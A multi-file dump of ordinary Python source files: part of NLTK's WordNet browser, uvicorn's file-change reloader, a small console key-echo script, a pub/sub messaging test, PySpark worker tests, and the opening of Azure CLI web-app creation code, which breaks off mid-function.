        return Reference(word, synset_relations)

    def toggle_synset_relation(self, synset, relation):
        """
        Toggle the display of the relations for the given synset and
        relation type.

        This function will throw a KeyError if the synset is currently
        not being displayed.
        """
        if relation in self.synset_relations[synset.name()]:
            self.synset_relations[synset.name()].remove(relation)
        else:
            self.synset_relations[synset.name()].add(relation)

        return self

    def toggle_synset(self, synset):
        """
        Toggle displaying of the relation types for the given synset
        """
        if synset.name() in self.synset_relations:
            del self.synset_relations[synset.name()]
        else:
            self.synset_relations[synset.name()] = set()

        return self
def make_lookup_link(ref, label):
    """Return an <a> element showing *label* that looks up *ref*
    (via its encode() method) when clicked."""
    return '<a href="lookup_{0}">{1}</a>'.format(ref.encode(), label)
def page_from_word(word):
    """
    Return a HTML page for the given word.

    :type word: str
    :param word: The currently active word
    :return: A tuple (page,word), where page is the new current HTML page
             to be sent to the browser and
             word is the new current word
    :rtype: A tuple (str,str)
    """
    ref = Reference(word)
    return page_from_reference(ref)
def page_from_href(href):
    '''
    Decode *href* (a string produced by Reference.encode) and return
    the page built for it.

    :param href: The hypertext reference to be solved
    :type href: str
    :return: A tuple (page,word), where page is the new current HTML page
             to be sent to the browser and
             word is the new current word
    :rtype: A tuple (str,str)
    '''
    decoded = Reference.decode(href)
    return page_from_reference(decoded)
def page_from_reference(href):
    '''
    Returns a tuple of the HTML page built and the new current word

    :param href: The reference (a Reference instance) to be resolved
    :type href: Reference
    :return: A tuple (page,word), where page is the new current HTML page
             to be sent to the browser and
             word is the new current word
    :rtype: A tuple (str,str)
    '''
    word = href.word
    pos_forms = defaultdict(list)
    # Accept a comma-separated list of words; normalize each to the
    # lower-case, underscore-joined form used by the WordNet corpus.
    words = word.split(',')
    words = [w for w in [w.strip().lower().replace(' ', '_')
                         for w in words]
             if w != ""]
    if len(words) == 0:
        # No words were found.
        return "", "Please specify a word to search for."

    # This looks up multiple words at once. This is probably not
    # necessary and may lead to problems.
    for w in words:
        for pos in [wn.NOUN, wn.VERB, wn.ADJ, wn.ADV]:
            form = wn.morphy(w, pos)
            if form and form not in pos_forms[pos]:
                pos_forms[pos].append(form)
    body = ''
    for pos, pos_str, name in _pos_tuples():
        if pos in pos_forms:
            body += _hlev(3, name) + '\n'
            for w in pos_forms[pos]:
                # Not all words of exc files are in the database, skip
                # to the next word if a KeyError is raised.
                try:
                    body += _collect_all_synsets(w, pos, href.synset_relations)
                except KeyError:
                    pass
    if not body:
        # BUG FIX: corrected typos in the user-visible message
        # ("where" -> "were", "dictonary" -> "dictionary").
        body = "The word or words '%s' were not found in the dictionary." % word
    return body, word
#####################################################################
# Static pages
#####################################################################
def get_static_page_by_path(path):
    """
    Return a static HTML page from the path given.
    """
    # Map every known path to a zero-argument producer (lambdas defer
    # the helper lookups until the page is actually requested); unknown
    # paths fall through to an error message.
    producers = {
        "index_2.html": lambda: get_static_index_page(False),
        "index.html": lambda: get_static_index_page(True),
        "NLTK Wordnet Browser Database Info.html":
            lambda: "Display of Wordnet Database Statistics is not supported",
        "upper_2.html": lambda: get_static_upper_page(False),
        "upper.html": lambda: get_static_upper_page(True),
        "web_help.html": lambda: get_static_web_help_page(),
        "wx_help.html": lambda: get_static_wx_help_page(),
    }
    if path in producers:
        return producers[path]()
    return "Internal error: Path for static page '%s' is unknown" % path
def get_static_web_help_page():
    """
    Return the static web help page.
    """
    # Fixed HTML document; no substitutions are performed.
    return \
"""
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2018 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <http://nltk.org/>
For license information, see LICENSE.TXT -->
<head>
<meta http-equiv='Content-Type' content='text/html; charset=us-ascii'>
<title>NLTK Wordnet Browser display of: * Help *</title>
</head>
<body bgcolor='#F5F5F5' text='#000000'>
<h2>NLTK Wordnet Browser Help</h2>
<p>The NLTK Wordnet Browser is a tool to use in browsing the Wordnet database. It tries to behave like the Wordnet project's web browser but the difference is that the NLTK Wordnet Browser uses a local Wordnet database.
<p><b>You are using the Javascript client part of the NLTK Wordnet BrowseServer.</b> We assume your browser is in tab sheets enabled mode.</p>
<p>For background information on Wordnet, see the Wordnet project home page: <a href="http://wordnet.princeton.edu/"><b> http://wordnet.princeton.edu/</b></a>. For more information on the NLTK project, see the project home:
<a href="http://nltk.sourceforge.net/"><b>http://nltk.sourceforge.net/</b></a>. To get an idea of what the Wordnet version used by this browser includes choose <b>Show Database Info</b> from the <b>View</b> submenu.</p>
<h3>Word search</h3>
<p>The word to be searched is typed into the <b>New Word</b> field and the search started with Enter or by clicking the <b>Search</b> button. There is no uppercase/lowercase distinction: the search word is transformed to lowercase before the search.</p>
<p>In addition, the word does not have to be in base form. The browser tries to find the possible base form(s) by making certain morphological substitutions. Typing <b>fLIeS</b> as an obscure example gives one <a href="MfLIeS">this</a>. Click the previous link to see what this kind of search looks like and then come back to this page by using the <b>Alt+LeftArrow</b> key combination.</p>
<p>The result of a search is a display of one or more
<b>synsets</b> for every part of speech in which a form of the
search word was found to occur. A synset is a set of words
having the same sense or meaning. Each word in a synset that is
underlined is a hyperlink which can be clicked to trigger an
automatic search for that word.</p>
<p>Every synset has a hyperlink <b>S:</b> at the start of its
display line. Clicking that symbol shows you the name of every
<b>relation</b> that this synset is part of. Every relation name is a hyperlink that opens up a display for that relation. Clicking it another time closes the display again. Clicking another relation name on a line that has an opened relation closes the open relation and opens the clicked relation.</p>
<p>It is also possible to give two or more words or collocations to be searched at the same time separating them with a comma like this <a href="Mcheer up,clear up">cheer up,clear up</a>, for example. Click the previous link to see what this kind of search looks like and then come back to this page by using the <b>Alt+LeftArrow</b> key combination. As you could see the search result includes the synsets found in the same order than the forms were given in the search field.</p>
<p>
There are also word level (lexical) relations recorded in the Wordnet database. Opening this kind of relation displays lines with a hyperlink <b>W:</b> at their beginning. Clicking this link shows more info on the word in question.</p>
<h3>The Buttons</h3>
<p>The <b>Search</b> and <b>Help</b> buttons need no more explanation. </p>
<p>The <b>Show Database Info</b> button shows a collection of Wordnet database statistics.</p>
<p>The <b>Shutdown the Server</b> button is shown for the first client of the BrowServer program i.e. for the client that is automatically launched when the BrowServer is started but not for the succeeding clients in order to protect the server from accidental shutdowns.
</p></body>
</html>
"""
def get_static_welcome_message():
    """
    Get the static welcome page.
    """
    # Fixed HTML fragment; no substitutions are performed.
    return \
"""
<h3>Search Help</h3>
<ul><li>The display below the line is an example of the output the browser
shows you when you enter a search word. The search word was <b>green</b>.</li>
<li>The search result shows for different parts of speech the <b>synsets</b>
i.e. different meanings for the word.</li>
<li>All underlined texts are hypertext links. There are two types of links:
word links and others. Clicking a word link carries out a search for the word
in the Wordnet database.</li>
<li>Clicking a link of the other type opens a display section of data attached
to that link. Clicking that link a second time closes the section again.</li>
<li>Clicking <u>S:</u> opens a section showing the relations for that synset.</li>
<li>Clicking on a relation name opens a section that displays the associated
synsets.</li>
<li>Type a search word in the <b>Next Word</b> field and start the search by the
<b>Enter/Return</b> key or click the <b>Search</b> button.</li>
</ul>
"""
def get_static_index_page(with_shutdown):
    """
    Get the static index page.

    The index is a two-frame page: a header frame (with or without a
    shutdown control, depending on *with_shutdown*) above a body frame
    that shows the start page.
    """
    template = \
"""
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2018 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <http://nltk.org/>
For license information, see LICENSE.TXT -->
<HEAD>
<TITLE>NLTK Wordnet Browser</TITLE>
</HEAD>

<frameset rows="7%%,93%%">
    <frame src="%s" name="header">
    <frame src="start_page" name="body">
</frameset>
</HTML>
"""
    upper_link = "upper.html" if with_shutdown else "upper_2.html"
    return template % upper_link
def get_static_upper_page(with_shutdown):
    """
    Return the upper frame page,

    If with_shutdown is True then a 'shutdown' button is also provided
    to shutdown the server.
    """
    template = \
"""
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2018 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <http://nltk.org/>
For license information, see LICENSE.TXT -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Untitled Document</title>
</head>
<body>
<form method="GET" action="search" target="body">
Current Word:&nbsp;<input type="text" id="currentWord" size="10" disabled>
Next Word:&nbsp;<input type="text" id="nextWord" name="nextWord" size="10">
<input name="searchButton" type="submit" value="Search">
</form>
<a target="body" href="web_help.html">Help</a>
%s

</body>
</html>
"""
    shutdown_link = "<a href=\"SHUTDOWN THE SERVER\">Shutdown</a>" if with_shutdown else ""
    return template % shutdown_link
def usage():
    """
    Display the command line help message.
    """
    # The module docstring doubles as the command-line help text.
    print(__doc__)
def app():
    """Command-line entry point: parse options and launch the browser
    server (or just print the help message)."""
    # Parse and interpret options.
    (opts, _) = getopt.getopt(argv[1:], "l:p:sh",
                              ["logfile=", "port=", "server-mode", "help"])

    port = 8000
    server_mode = False
    help_mode = False
    logfilename = None

    for (opt, value) in opts:
        if opt in ("-l", "--logfile"):
            logfilename = str(value)
        elif opt in ("-p", "--port"):
            port = int(value)
        elif opt in ("-s", "--server-mode"):
            server_mode = True
        elif opt in ("-h", "--help"):
            help_mode = True

    if help_mode:
        usage()
    else:
        wnb(port, not server_mode, logfilename)
if __name__ == '__main__':
    app()

# Public API of this module.
__all__ = ['app']
|
statreload.py | import logging
import multiprocessing
import os
import signal
import sys
import time
from pathlib import Path
import click
HANDLED_SIGNALS = (
signal.SIGINT, # Unix signal 2. Sent by Ctrl+C.
signal.SIGTERM, # Unix signal 15. Sent by `kill <pid>`.
)
logger = logging.getLogger("uvicorn.error")
class StatReload:
    """Restart a worker subprocess whenever a watched .py file changes.

    Polls the mtimes of every Python file under ``config.reload_dirs``;
    when any file becomes newer than its recorded time, the current
    worker is terminated with SIGTERM and a fresh one is spawned.
    """

    def __init__(self, config):
        self.config = config
        self.should_exit = False  # set by the signal handler to stop run()
        self.reload_count = 0     # number of restarts performed
        self.mtimes = {}          # filename -> last observed st_mtime

    def handle_exit(self, sig, frame):
        """Signal handler: request a clean shutdown of the reloader loop."""
        self.should_exit = True

    def get_subprocess(self, target, kwargs):
        """Build (but do not start) a spawn-context worker process."""
        spawn = multiprocessing.get_context("spawn")
        try:
            fileno = sys.stdin.fileno()
        except OSError:
            # stdin may be closed or not a real file descriptor (e.g.
            # under some process managers); the child gets no stdin then.
            fileno = None
        return spawn.Process(
            target=self.start_subprocess, args=(target, fileno), kwargs=kwargs
        )

    def start_subprocess(self, target, fd_stdin, **kwargs):
        """Child-process entry point: reattach stdin, set up logging,
        then run *target*."""
        if fd_stdin is not None:
            sys.stdin = os.fdopen(fd_stdin)
        self.config.configure_logging()
        target(**kwargs)

    def run(self, target, **kwargs):
        """Supervise *target* in a subprocess, restarting it whenever a
        watched file changes, until the child dies or a handled signal
        arrives."""
        pid = str(os.getpid())

        message = "Started reloader process [{}]".format(pid)
        color_message = "Started reloader process [{}]".format(
            click.style(pid, fg="cyan", bold=True)
        )
        logger.info(message, extra={"color_message": color_message})

        for sig in HANDLED_SIGNALS:
            signal.signal(sig, self.handle_exit)

        process = self.get_subprocess(target, kwargs=kwargs)
        process.start()

        while process.is_alive() and not self.should_exit:
            time.sleep(0.3)
            if self.should_restart():
                self.clear()
                os.kill(process.pid, signal.SIGTERM)
                process.join()

                process = self.get_subprocess(target, kwargs=kwargs)
                process.start()
                self.reload_count += 1

        message = "Stopping reloader process [{}]".format(pid)
        color_message = "Stopping reloader process [{}]".format(
            click.style(pid, fg="cyan", bold=True)
        )
        logger.info(message, extra={"color_message": color_message})

    def clear(self):
        """Forget all recorded mtimes (used right before a restart)."""
        self.mtimes = {}

    def should_restart(self):
        """Return True when any watched file has a newer mtime than the
        one recorded on the previous pass."""
        for filename in self.iter_py_files():
            try:
                mtime = os.stat(filename).st_mtime
            except OSError:  # pragma: nocover
                # File vanished between the walk and the stat; skip it.
                # (The exception value was previously bound but unused.)
                continue

            old_time = self.mtimes.get(filename)
            if old_time is None:
                # First sighting: record the baseline, no restart yet.
                self.mtimes[filename] = mtime
                continue
            elif mtime > old_time:
                display_path = os.path.normpath(filename)
                if Path.cwd() in Path(filename).parents:
                    display_path = os.path.normpath(os.path.relpath(filename))
                message = "Detected file change in '%s'. Reloading..."
                logger.warning(message, display_path)
                return True
        return False

    def iter_py_files(self):
        """Yield the path of every .py file under the watched directories."""
        for reload_dir in self.config.reload_dirs:
            for subdir, _dirs, files in os.walk(reload_dir):
                for fname in files:
                    # os.path.join instead of manual separator gluing.
                    filepath = os.path.join(subdir, fname)
                    if filepath.endswith(".py"):
                        yield filepath
|
prova.py | import threading, time
from msvcrt import getch
key = "lol"
def thread1():
    """Background thread: block on msvcrt.getch() forever, storing each
    keypress in the module-level *key*.

    NOTE(review): the Lock is created locally inside this thread and is
    never shared with the main loop, so it provides no synchronization —
    presumably leftover code; confirm before relying on it.
    """
    global key
    lock = threading.Lock()
    while True:
        with lock:
            key = getch()
# Start the key-reader thread, then echo the most recent key roughly
# every millisecond (runs forever; stop with ctrl-c).
threading.Thread(target = thread1).start()
while True:
    time.sleep(0.001)
    print(key)
collector-test.py | #!/usr/bin/env python3
from __future__ import print_function, division
# from the_collector import BagReader, BagWriter
# fix path for now
import sys
sys.path.append("../")
from the_collector.messages import Messages
from the_collector.messages import Vector
from the_collector.messages import IMU
from pygecko.transport import Pub, Sub
from pygecko.transport import zmqTCP, GeckoCore
import multiprocessing as mp
import time
def publisher(e, topic):
    """Publish one IMU message per second on *topic* while Event *e* is set.

    Intended to run in its own process; exits when the shared Event is
    cleared or the transport raises.
    """
    mm = Messages()
    p = Pub(pack=mm.serialize)
    addr = zmqTCP('localhost', 9998)
    p.connect(addr)
    name = mp.current_process().name
    try:
        cnt = 0
        while e.is_set():
            msg = IMU(Vector(1,2,3),Vector(1,2,3),Vector(1,2,3))
            p.pub(topic, msg)  # topic msg
            cnt += 1  # NOTE(review): counter is never read — presumably leftover debug state
            print(name, 'published msg on', topic)
            time.sleep(1)
    except Exception:
        # Best-effort shutdown: any transport error just ends the loop.
        pass
    print("*"*30)
    print('*** {} pub bye'.format(name))
    print("*"*30)
def subscriber(e, topic):
    """Receive and print messages on *topic* while Event *e* is set.

    Intended to run in its own process; exits when the shared Event is
    cleared or recv() raises (e.g. when the core shuts down).
    """
    mm = Messages()
    s = Sub(topics=[topic], unpack=mm.deserialize)
    addr = zmqTCP('localhost', 9999)
    s.connect(addr)
    name = mp.current_process().name
    try:
        while e.is_set():
            t, msg = s.recv()
            # print(s.recv(flags=zmq.NOBLOCK))
            # print("recv[{}]: {}".format(*s.recv()))
            # print(name, 'recvd message')
            # Bug fix: the original format string had only two placeholders
            # for three arguments, silently dropping the message body.
            print('{} recvd[{}]: {}'.format(name, t, msg))
    except Exception as exc:  # renamed: previously shadowed the Event parameter `e`
        print(exc)
    print("*"*30)
    print('*** {} Sub bye'.format(name))
    print("*"*30)
if __name__ == '__main__':
    # Shared run flag: worker loops spin while it is set; clearing it
    # asks every publisher/subscriber process to exit.
    e = mp.Event()
    e.set()
    # Message hub the pub/sub sockets connect through.
    core = GeckoCore()
    procs = []
    p = mp.Process(target=publisher, args=(e, 'bob'), name='bob-publisher')
    p.start()
    procs.append(p)
    p = mp.Process(target=publisher, args=(e, 'sally'), name='sally-publisher')
    p.start()
    procs.append(p)
    p = mp.Process(target=subscriber, args=(e, 'bob'), name='bob-subscriber')
    p.start()
    procs.append(p)
    p = mp.Process(target=subscriber, args=(e, 'sally'), name='sally-1-subscriber')
    p.start()
    procs.append(p)
    p = mp.Process(target=subscriber, args=(e, 'sally'), name='sally-2-subscriber')
    p.start()
    procs.append(p)
    # def signal_handler(signalnum, stackframe):
    #     print('ctrl-c signal.')
    #     e.clear()
    #     sys.exit(0)
    #
    # # kill -l
    # signal.signal(signal.SIGINT, signal_handler)
    # signal.signal(signal.SIGTERM, signal_handler)
    # Run for ~5 seconds, allowing ctrl-c to stop early.
    for _ in range(5):
        try:
            time.sleep(1)
        except KeyboardInterrupt:
            print('ctrl-c')
            break
    # Ask everyone to stop, then reap with escalating force.
    e.clear()
    time.sleep(1)
    for p in procs:
        print("<<< killing {} {} >>>".format(p.name, p.pid))
        p.join(1)
        # if you kill the publisher before the subscriber, the sub gets stuck
        # because recv() is blocking
        if p.is_alive():
            print('Crap, {} is still alive, terminate!'.format(p.name))
            p.terminate()
            p.join(0.1)
    core.join(1)
    exit()
|
test_worker.py | # -*- encoding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import tempfile
import threading
import time
import unittest
has_resource_module = True
try:
import resource
except ImportError:
has_resource_module = False
from py4j.protocol import Py4JJavaError
from pyspark import SparkConf, SparkContext
from pyspark.testing.utils import ReusedPySparkTestCase, PySparkTestCase, QuietTest
if sys.version_info[0] >= 3:
xrange = range
class WorkerTests(ReusedPySparkTestCase):
    """Tests for the PySpark daemon/worker process lifecycle."""

    def test_cancel_task(self):
        """Cancelling all jobs must kill the worker but leave the daemon alive."""
        # Use only the *name* of a NamedTemporaryFile as a rendezvous path;
        # the worker task will (re)create it to report its pids.
        temp = tempfile.NamedTemporaryFile(delete=True)
        temp.close()
        path = temp.name

        def sleep(x):
            # Runs inside the Spark worker: write "daemon_pid worker_pid"
            # to the rendezvous file, then block so the job stays running.
            import os
            import time
            with open(path, 'w') as f:
                f.write("%d %d" % (os.getppid(), os.getpid()))
            time.sleep(100)

        # start job in background thread
        def run():
            try:
                self.sc.parallelize(range(1), 1).foreach(sleep)
            except Exception:
                pass
        import threading
        t = threading.Thread(target=run)
        t.daemon = True
        t.start()

        # Wait for the worker task to report its pids.
        daemon_pid, worker_pid = 0, 0
        while True:
            if os.path.exists(path):
                with open(path) as f:
                    data = f.read().split(' ')
                daemon_pid, worker_pid = map(int, data)
                break
            time.sleep(0.1)

        # cancel jobs
        self.sc.cancelAllJobs()
        t.join()

        # Poll with signal 0 (existence check) for up to ~5 seconds.
        for i in range(50):
            try:
                os.kill(worker_pid, 0)
                time.sleep(0.1)
            except OSError:
                break  # worker was killed
        else:
            self.fail("worker has not been killed after 5 seconds")

        try:
            os.kill(daemon_pid, 0)
        except OSError:
            self.fail("daemon had been killed")

        # run a normal job
        rdd = self.sc.parallelize(xrange(100), 1)
        self.assertEqual(100, rdd.map(str).count())

    def test_after_exception(self):
        """Worker must survive a Python exception raised inside a task."""
        def raise_exception(_):
            raise Exception()
        rdd = self.sc.parallelize(xrange(100), 1)
        with QuietTest(self.sc):
            self.assertRaises(Exception, lambda: rdd.foreach(raise_exception))
        self.assertEqual(100, rdd.map(str).count())

    def test_after_jvm_exception(self):
        """Worker must survive a JVM-side failure (input file deleted)."""
        tempFile = tempfile.NamedTemporaryFile(delete=False)
        tempFile.write(b"Hello World!")
        tempFile.close()
        data = self.sc.textFile(tempFile.name, 1)
        filtered_data = data.filter(lambda x: True)
        self.assertEqual(1, filtered_data.count())
        # Deleting the backing file makes the next count fail in the JVM.
        os.unlink(tempFile.name)
        with QuietTest(self.sc):
            self.assertRaises(Exception, lambda: filtered_data.count())
        rdd = self.sc.parallelize(xrange(100), 1)
        self.assertEqual(100, rdd.map(str).count())

    def test_accumulator_when_reuse_worker(self):
        """Accumulators must not double-count when worker processes are reused."""
        from pyspark.accumulators import INT_ACCUMULATOR_PARAM
        acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
        self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc1.add(x))
        self.assertEqual(sum(range(100)), acc1.value)
        acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
        self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc2.add(x))
        self.assertEqual(sum(range(100)), acc2.value)
        # acc1 must be unchanged by the second job.
        self.assertEqual(sum(range(100)), acc1.value)

    def test_reuse_worker_after_take(self):
        """A worker reused after take()/first() must still finish a full count."""
        rdd = self.sc.parallelize(xrange(100000), 1)
        self.assertEqual(0, rdd.first())

        def count():
            try:
                rdd.count()
            except Exception:
                pass

        t = threading.Thread(target=count)
        t.daemon = True
        t.start()
        t.join(5)
        # NOTE(review): Thread.isAlive() was removed in Python 3.9 in favor
        # of is_alive() — confirm against the supported Python versions.
        self.assertTrue(not t.isAlive())
        self.assertEqual(100000, rdd.count())

    def test_with_different_versions_of_python(self):
        """A driver/worker Python version mismatch must fail the job."""
        rdd = self.sc.parallelize(range(10))
        rdd.count()
        version = self.sc.pythonVer
        self.sc.pythonVer = "2.0"
        try:
            with QuietTest(self.sc):
                self.assertRaises(Py4JJavaError, lambda: rdd.count())
        finally:
            # Always restore the real version for subsequent tests.
            self.sc.pythonVer = version

    def test_python_exception_non_hanging(self):
        # SPARK-21045: exceptions with no ascii encoding shall not hanging PySpark.
        try:
            def f():
                raise Exception("exception with 中 and \xd6\xd0")
            self.sc.parallelize([1]).map(lambda x: f()).count()
        except Py4JJavaError as e:
            if sys.version_info.major < 3:
                # we have to use unicode here to avoid UnicodeDecodeError
                self.assertRegexpMatches(unicode(e).encode("utf-8"), "exception with 中")
            else:
                self.assertRegexpMatches(str(e), "exception with 中")
class WorkerReuseTest(PySparkTestCase):
    """Checks that Python worker processes are reused across jobs."""

    def test_reuse_worker_of_parallelize_xrange(self):
        """Every pid seen in the second collect must have served the first."""
        rdd = self.sc.parallelize(xrange(20), 8)
        previous_pids = rdd.map(lambda x: os.getpid()).collect()
        current_pids = rdd.map(lambda x: os.getpid()).collect()
        for pid in current_pids:
            self.assertTrue(pid in previous_pids)
@unittest.skipIf(
    not has_resource_module,
    "Memory limit feature in Python worker is dependent on "
    "Python's 'resource' module; however, not found.")
class WorkerMemoryTest(unittest.TestCase):
    """Verifies spark.executor.pyspark.memory caps the worker address space."""

    def setUp(self):
        # Fresh local context per test with a 2g Python worker memory cap.
        class_name = self.__class__.__name__
        conf = SparkConf().set("spark.executor.pyspark.memory", "2g")
        self.sc = SparkContext('local[4]', class_name, conf=conf)

    def test_memory_limit(self):
        """RLIMIT_AS soft/hard limits inside the worker must both be 2 GiB."""
        rdd = self.sc.parallelize(xrange(1), 1)

        def getrlimit():
            # Runs inside the worker process.
            import resource
            return resource.getrlimit(resource.RLIMIT_AS)

        actual = rdd.map(lambda _: getrlimit()).collect()
        self.assertTrue(len(actual) == 1)
        self.assertTrue(len(actual[0]) == 2)

        [(soft_limit, hard_limit)] = actual
        self.assertEqual(soft_limit, 2 * 1024 * 1024 * 1024)
        self.assertEqual(hard_limit, 2 * 1024 * 1024 * 1024)

    def tearDown(self):
        self.sc.stop()
if __name__ == "__main__":
    import unittest
    from pyspark.tests.test_worker import *
    # Prefer XML test reports (for CI) when xmlrunner is installed;
    # otherwise fall back to the default text runner.
    try:
        import xmlrunner
        testRunner = xmlrunner.XMLTestRunner(output='target/test-reports', verbosity=2)
    except ImportError:
        testRunner = None
    unittest.main(testRunner=testRunner, verbosity=2)
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
import time
import ast
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from functools import reduce
from http import HTTPStatus
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.mgmt.web.models import KeyInfo, DefaultErrorResponseException
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait, get_file_json
from azure.cli.core.util import get_az_user_agent
from azure.cli.core.profiles import ResourceType, get_sdk
from .tunnel import TunnelServer
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory
from ._appservice_utils import _generic_site_operation
from .utils import _normalize_sku, get_sku_name, retryable_method
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
should_create_new_rg, set_location, get_site_availability, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src)
from ._constants import (FUNCTIONS_STACKS_API_JSON_PATHS, FUNCTIONS_STACKS_API_KEYS,
FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX,
NODE_VERSION_DEFAULT, RUNTIME_STACKS, FUNCTIONS_NO_V2_REGIONS)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None,  # pylint: disable=too-many-statements,too-many-branches
                  deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
                  deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
                  multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
                  using_webapp_up=False, language=None, assign_identities=None,
                  role='Contributor', scope=None):
    """Create (or reuse) an App Service web app on the given plan.

    Builds a SiteConfig appropriate for the plan's OS (Linux, Windows
    container, or plain Windows), submits the create_or_update long-running
    operation, then wires up source control, FTP URL, container settings
    and managed identity as requested. Returns the created Site object.
    Raises CLIError on invalid argument combinations or lookup failures.
    """
    SiteConfig, SkuDescription, Site, NameValuePair = cmd.get_models(
        'SiteConfig', 'SkuDescription', 'Site', 'NameValuePair')
    if deployment_source_url and deployment_local_git:
        raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
    docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
    client = web_client_factory(cmd.cli_ctx)
    # The plan may be given as a full ARM resource id or a bare name.
    if is_valid_resource_id(plan):
        parse_result = parse_resource_id(plan)
        plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
    else:
        plan_info = client.app_service_plans.get(resource_group_name, plan)
    if not plan_info:
        # NOTE(review): this message is missing the closing quote after '{}'.
        raise CLIError("The plan '{}' doesn't exist in the resource group '{}".format(plan, resource_group_name))
    is_linux = plan_info.reserved
    node_default_version = NODE_VERSION_DEFAULT
    location = plan_info.location
    # This is to keep the existing appsettings for a newly created webapp on existing webapp name.
    name_validation = client.check_name_availability(name, 'Site')
    if not name_validation.name_available:
        if name_validation.reason == 'Invalid':
            raise CLIError(name_validation.message)
        # Name taken by an existing app: reuse that app's settings instead
        # of starting from an empty config.
        logger.warning("Webapp '%s' already exists. The command will use the existing app's settings.", name)
        app_details = get_app_details(cmd, name)
        if app_details is None:
            raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that "
                           "the app is a part of the current subscription".format(name))
        current_rg = app_details.resource_group
        if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
            raise CLIError("The webapp '{}' exists in resource group '{}' and does not "
                           "match the value entered '{}'. Please re-run command with the "
                           "correct parameters.". format(name, current_rg, resource_group_name))
        existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name,
                                                        name, 'list_application_settings')
        settings = []
        for k, v in existing_app_settings.properties.items():
            settings.append(NameValuePair(name=k, value=v))
        site_config = SiteConfig(app_settings=settings)
    else:
        site_config = SiteConfig(app_settings=[])
    # Always-on is unavailable on free/shared/basic tiers.
    if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
                                                                                       'B1', 'B2', 'B3', 'BASIC']:
        site_config.always_on = True
    webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
                      https_only=using_webapp_up)
    helper = _StackRuntimeHelper(cmd, client, linux=is_linux)
    if is_linux:
        # Linux: exactly one of runtime / container image / multicontainer
        # config may be specified (type and file must come together).
        if not validate_container_app_create_options(runtime, deployment_container_image_name,
                                                     multicontainer_config_type, multicontainer_config_file):
            raise CLIError("usage error: --runtime | --deployment-container-image-name |"
                           " --multicontainer-config-type TYPE --multicontainer-config-file FILE")
        if startup_file:
            site_config.app_command_line = startup_file
        if runtime:
            site_config.linux_fx_version = runtime
            match = helper.resolve(runtime)
